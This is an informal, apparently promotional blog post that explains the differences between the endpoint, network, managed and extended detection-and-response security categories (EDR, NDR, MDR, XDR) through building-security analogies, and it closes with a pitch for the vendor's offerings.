Here’s a fun fact for you: did you know that an abbreviation is only an acronym if it can be pronounced as a word, such as ASCII, or YOLO? If the initials are pronounced separately, then the correct term is ‘initialism’. ‘That’s absolutely intriguing,’ you may think to yourself (all right; maybe I’m playing criminally fast and loose with the word ‘intriguing’, especially when I was already on perilously thin ice with the word ‘fun’), ‘but what does that have to do with IT?’ Well, aside from the term ‘IT’ being an initialism itself, the industry as a whole is a seething mass of them.
Specifically, there are four that we’re going to be looking at here. Four that are very often intertwined, but still distinct; in short, the perfect recipe for confusion. That’s right; we’re looking at EDR, NDR, MDR and XDR.
EDR and NDR
To simplify things as much as possible, we’re going to break things down a little further. In essence, EDR and NDR are the primary detection and response toolsets and carry out the same basic functions – what really differentiates them from each other is where they function in an organisation’s network.
Let’s start with Endpoint Detection and Response, or EDR. In many ways, this is the bread and butter of most IT security infrastructures. Endpoints are the doors to an organisation’s network, which wasn’t so concerning in the past, but as the number of endpoints grows (and consider that this is no longer limited to laptops, but phones, tablets – literally anything that can connect to the network), the more doors the network has, the more important it becomes to invest in a decent set of locks.
Scaling things up slightly from doors to a house; if your network is a high security building, then the perimeter of that building is defined by the devices on it. EDR functions as watchtowers along the perimeter wall, detecting and blocking malicious activity. This is achieved by continuously monitoring activity and collecting data on endpoints and analysing this data in real time, allowing for quick diagnosis of threats. This works in tandem with automated threat response in order to detect and contain threats and protect the network against infiltration.
Whereas EDR monitors activity on user devices, Network Detection & Response – or NDR – monitors activity between the devices. EDR tools are ideal for monitoring and mitigating malicious activity at the network perimeter, but with networks becoming ever more complex and network perimeters expanding and fluctuating far beyond the office environments of the past, EDR tools alone are not equipped to manage every eventuality. Conditions are ideal for cybercriminals to sneak in and move laterally within the network, or even lie in wait in the dark spaces of a network for an opportune moment to strike.
Returning to the previous analogy of EDR as the walls of a high security building, think of NDR as installing floodlights within the walls. Using tools like machine learning and behavioural analytics, NDR monitors the traffic between devices on the network and alerts security teams to unusual behaviour, greatly increasing visibility, eliminating the blind spots, and massively decreasing the number of places in which malicious actors can hide.
MDR and XDR
To quote John Cleese in Monty Python, ‘and now for something completely different’. Well, actually, not that different, but who’s going to turn down a semi-decent opportunity for a Monty Python reference? In fact, the base toolsets utilised by MDR and XDR are not functionally dissimilar from EDR and NDR – what separates MDR and XDR is that they take a slightly different approach to how those tools are used.
The ability to detect and contain threats is priority when it comes to protecting your network, but the evolving cybersecurity landscape doesn’t just present problems in terms of the network perimeter. Many IT teams may be understaffed, struggling to quickly build the skillsets necessary to keep up with the technology they’re deploying, or simply too overwhelmed by security alerts to know what to prioritise. You could have deployed the most advanced security stack in the world, but if the humans operating it don’t have the capability to use it optimally, you’ve got the technological equivalent of a very expensive paperweight.
Unlike the other tools mentioned, MDR is a managed service, not a technology – hence, Managed Detection & Response. MDR builds on the foundation of EDR, combining the technology with human expertise to assist with analysing, prioritising, and responding to threats. Not only does this significantly reduce the workload on IT security teams, but it also ensures that the security tools you already have are being used to their full potential.
If you’ve been following our LinkedIn page for any length of time, you’ve surely heard Cynet’s song (if not, we can wait while you have a listen, and you can thank us later). But sure-fire number one hits aside, what is XDR? Put simply, Extended Detection and Response is the evolution of EDR and NDR. MDR helps to compensate for human limitation, but human limitation isn’t always the problem. Let’s go back to that most advanced security stack in the world; chances are that that’s going to be made up of multiple different tools which may work together, but aren’t necessarily talking to each other, leaving your IT team to effectively mediate between them.
XDR is a new, holistic approach which enhances and extends the capabilities of EDR beyond endpoint protection to grant visibility across the whole network and security stack, effectively rolling EDR and NDR into one. On top of this, it then analyses and prioritises this data before consolidating it into a single console, streamlining the whole process and allowing your IT teams to respond more effectively to threats.
Now that you’ve got a clearer idea of what each tool does, the next step is to decide which solution, or combination of solutions, best suits your organisation. Take a look at the security solutions we offer to learn more: